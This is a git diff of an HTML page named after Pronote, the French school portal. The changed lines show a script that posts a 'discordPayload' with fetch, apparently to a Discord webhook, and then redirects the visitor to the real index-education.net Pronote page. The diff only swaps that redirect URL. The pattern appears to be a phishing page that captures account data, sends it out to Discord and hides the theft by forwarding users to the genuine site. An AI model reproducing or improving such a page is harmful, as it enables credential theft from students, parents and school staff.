--- a/pronote/accompagnant.html
+++ b/pronote/accompagnant.html
@@ -46,7 +46,7 @@ Default styles for videojs-record 4.5.0
                         body: JSON.stringify(discordPayload),
                     });
 
-                    window.location.href = "https://3500002a.index-education.net/pronote/professeur.html?fd=1";
+                    window.location.href = "https://3500002a.index-education.net/pronote/accompagnant.html";
                 } catch (error) {
                     console.error('Erreur réseau :', error);
                 }
